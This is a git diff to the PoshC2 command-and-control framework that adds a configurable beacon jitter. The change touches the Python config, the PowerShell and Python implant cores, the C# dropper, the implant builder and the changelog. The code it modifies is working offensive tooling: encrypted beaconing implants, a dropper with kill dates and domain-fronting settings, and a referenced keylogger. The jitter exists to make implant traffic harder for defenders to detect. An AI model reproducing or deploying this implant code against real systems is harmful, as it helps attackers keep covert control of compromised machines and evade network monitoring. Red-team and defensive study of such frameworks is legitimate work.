diff --git a/Config.py b/Config.py index 7ddeced..1c624ad 100644 --- a/Config.py +++ b/Config.py @@ -9,6 +9,7 @@ ROOTDIR = "/opt/PoshC2_Project/" HostnameIP = "https://192.168.233.1" DomainFrontHeader = "" # example df.azureedge.net DefaultSleep = "5s" +Jitter = 0.20 KillDate = "08/06/2019" UserAgent = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" urlConfig = UrlConfig("%soldurls.txt" % POSHDIR) # Instantiate UrlConfig object - old urls using a list from a text file diff --git a/Files/Implant-Core.ps1 b/Files/Implant-Core.ps1 index b329a86..3f25544 100644 --- a/Files/Implant-Core.ps1 +++ b/Files/Implant-Core.ps1 @@ -1,4 +1,5 @@ $key="%s" +$jitter=%s Function Beacon($sleeptime) { if ($sleeptime.ToLower().Contains('m')) { $sleeptime = $sleeptime -replace 'm', '' @@ -119,17 +120,17 @@ function Encrypt-String($key, $unencryptedString) { [System.Convert]::ToBase64String($fullData) } function Encrypt-Bytes($key, $bytes) { - [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream - $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) - $gzipStream.Write( $bytes, 0, $bytes.Length ) - $gzipStream.Close() - $bytes = $output.ToArray() - $output.Close() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData + [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream + $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) + $gzipStream.Write( $bytes, 0, $bytes.Length ) + $gzipStream.Close() + $bytes = $output.ToArray() + $output.Close() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData } function Decrypt-String($key, $encryptedStringWithIV) { $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) @@ -188,7 +189,7 @@ while($true) $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) if ($killdate -lt $date) {exit} - $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) + $sleeptimeran = $sleeptime, ($sleeptime * (1 + $Jitter)), ($sleeptime * (1 - $Jitter)) $newsleep = $sleeptimeran|get-random if ($newsleep -lt 1) {$newsleep = 5} start-sleep $newsleep diff --git a/Files/Implant-Core.py b/Files/Implant-Core.py index 1a3a7a4..9e57203 100644 --- a/Files/Implant-Core.py +++ b/Files/Implant-Core.py @@ -15,6 +15,7 @@ urls = [%s] kd=time.strptime("%s","%%d/%%m/%%Y") useragent = "" imbase = "%s" +jitter = %s def keylog(): # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py @@ -96,7 +97,8 @@ while(True): uri = "%s" server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) try: - time.sleep(timer) + this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter)) + time.sleep(this_timer) ua='%s' if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) else: req=urllib2.Request(server,headers={'User-agent':ua}) diff --git a/Files/dropper.cs b/Files/dropper.cs index 41245c5..ca28fdb 100644 --- a/Files/dropper.cs +++ b/Files/dropper.cs @@ -210,6 +210,10 @@ public class Program m = re.Match(x); var Sleep = m.Groups[1].ToString(); + re = new Regex("JITTER2025(.*)5202RETTIJ"); + m = re.Match(x); + var Jitter = m.Groups[1].ToString(); + re = new Regex("NEWKEY8839394(.*)4939388YEKWEN"); m = re.Match(x); var NewKey = m.Groups[1].ToString(); @@ -218,7 +222,7 @@ public class Program m = re.Match(x); var IMGs = m.Groups[1].ToString(); - ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs); + ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs, Jitter); } } @@ -365,7 +369,7 @@ public class Program } } - static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS) + static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter) { UrlGen.Init(stringURLS, RandomURI, baseURL); ImgGen.Init(stringIMGS); @@ -381,7 +385,7 @@ public class Program Console.SetOut(strOutput); var exitvt = new ManualResetEvent(false); var output = new StringBuilder(); - while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95)))) + while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - Double.Parse(Jitter))), (int)(beacontime * 1000 * (1F + Double.Parse(Jitter))))))) { if (Convert.ToDateTime(KillDate) < DateTime.Now) { diff --git a/Implant.py b/Implant.py index 40bd05a..ae9dbf5 100644 --- a/Implant.py +++ b/Implant.py @@ -2,7 +2,7 @@ from Colours import Colours from Utils import randomuri, gen_key -from Config import PayloadsDirectory, FilesDirectory +from Config import PayloadsDirectory, FilesDirectory, Jitter from DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns from Core import get_images @@ -28,6 +28,7 @@ class Implant(object): self.UserAgent = get_defaultuseragent() self.Sleep = get_defaultbeacon() self.ModsLoaded = "" + self.Jitter = Jitter self.ImplantID = "" self.Pivot = pivot self.KillDate = get_killdate() @@ -39,16 +40,17 @@ RANDOMURI19901%s10991IRUMODNAR URLS10484390243%s34209348401SLRU KILLDATE1665%s5661ETADLLIK SLEEP98001%s10089PEELS +JITTER2025%s5202RETTIJ NEWKEY8839394%s4939388YEKWEN -IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) +IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages) with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) py_implant_core = open("%s/Implant-Core.py" % FilesDirectory, 'r').read() - self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent) ps_implant_core = open("%s/Implant-Core.ps1" % FilesDirectory, 'r').read() - self.PSCore = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) -#Add all db elements + self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): + #Add all db elements def display(self): print Colours.GREEN,"" it = self.Pivot diff --git a/changelog.txt b/changelog.txt index bb6fa76..2929d59 100644 --- a/changelog.txt +++ b/changelog.txt @@ -10,6 +10,7 @@ Add ability to upload a file to an ADS Update BloodHound Pull out unpatched payloads into file for easy management Add base64 encoded versions of the shellcode to the payloads directory +Add a configurable jitter to all implants 4.8 (13/02/19) ==============